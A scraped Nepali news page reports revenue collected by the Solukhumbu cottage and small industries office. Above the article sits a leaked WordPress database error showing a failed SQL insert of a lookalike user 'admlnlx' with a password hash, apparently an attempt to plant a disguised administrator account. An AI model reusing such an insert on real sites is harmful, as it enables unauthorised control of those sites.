WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZu52e5XuUgCu.lJ7KYDyflaG8H1tM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 07:19:44', '', 'admlnlx', 'admlnlx')

२५ लाख बढी घरेलु कार्यालय सोलुको राजस्व सङकलन – Gaule Khabar

२५ लाख बढी घरेलु कार्यालय सोलुको राजस्व सङकलन

२५ लाख बढी घरेलु कार्यालय सोलुको राजस्व सङकलन

काठमाण्डौ । सोलुखुम्बु जिल्लामा घरेलु तथा साना उद्योग कार्यालय सोलुखुम्बुले एक आर्थिक बर्षमा २५ लाख रुपैयाँ भन्दा बढी राजस्व संकलन गरेको छ । आर्थिक बर्ष २०७८र०७९ मा २५ लाख ५१ हजार ८ सय २५ रुपैयाँ राजस्व संकलन गरेको छ ।

उद्योग दर्ताबाट १० लाख ५५ हजार ४ सय, उद्योग नविकरण र अन्य सेवा शुल्कबाट ७ लाख ८० हजार ५ सय २५, बाणिज्य दर्ता तथा नविकरणबाट ७ लाख १५ हजार ९ सय रुपैयाँ राजस्व संकलन भएको हो । आर्थिक बर्ष ३२९ वटा उद्योग दर्ता र १४६ वटा नविकरण भएको कार्यालयले जनाएको छ ।

दर्ता भएका बाणिज्यमा किराना पसल १७, स्टोर्स ८, अडर सप्लायर्स ४२, इलेक्टोनिक पसल ८, मासु पसल ४, फेन्सी पसल १३, इन्टर प्राइजेज १ र औसधी पसल १ वटा रहेको कार्यालयको तथ्यांक छ ।

नयाँ दर्ता भएका उद्योग मध्ये उत्पादन मुलक २४, कृषि तथा बन जन्य २२८ वटा, निर्माण सम्बन्धि १२ वटा र सेवामुलक ६५ रहेका छन् । सोही अवधीमा ९५ वटा बाणिज्य फर्म दर्ता र ११६ वटा नविकरण भएका छन् ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका